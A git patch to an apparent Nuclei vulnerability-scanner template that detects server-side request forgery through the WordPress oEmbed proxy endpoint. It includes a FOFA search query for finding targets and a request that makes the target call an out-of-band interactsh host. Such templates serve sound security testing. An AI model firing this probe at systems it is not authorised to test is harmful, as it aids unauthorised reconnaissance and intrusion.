From 93863aeb08ad66002d3cf64928cdcab0e1156925 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 4 Sep 2023 23:43:10 +0530
Subject: [PATCH] Update wordpress-ssrf-oembed.yaml

---
 .../wordpress/wordpress-ssrf-oembed.yaml      | 32 +++++++++++--------
 1 file changed, 19 insertions(+), 13 deletions(-)

diff --git a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml
index ac39f6ee4d..d62f4a5f56 100644
--- a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml
+++ b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml
@@ -1,29 +1,35 @@
 id: wordpress-ssrf-oembed
 
 info:
-  name: Wordpress Oembed Proxy SSRF
+  name: Wordpress Oembed Proxy - Server-side request forgery
   author: dhiyaneshDk
   severity: medium
   reference:
     - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
     - https://github.com/incogbyte/quickpress/blob/master/core/req.go
-  tags: wordpress,ssrf,oast,proxy
   metadata:
-    fofa-query: body="oembed" && body="wp-"
     max-request: 1
+    fofa-query: body="oembed" && body="wp-"
+  tags: wordpress,ssrf,oast,oembed
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-json/oembed/1.0/proxy"
-      - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/"
+  - raw:
+      - |
+        GET /wp-json/oembed/1.0/proxy HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}} HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - 'contains(to_lower(response_1), "rest_missing_callback_param")'
+      - type: word
+        part: body_1
+        words:
+          - 'rest_missing_callback_param'
 
-      - type: dsl
-        dsl:
-          - 'contains(interactsh_protocol, "http")'
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"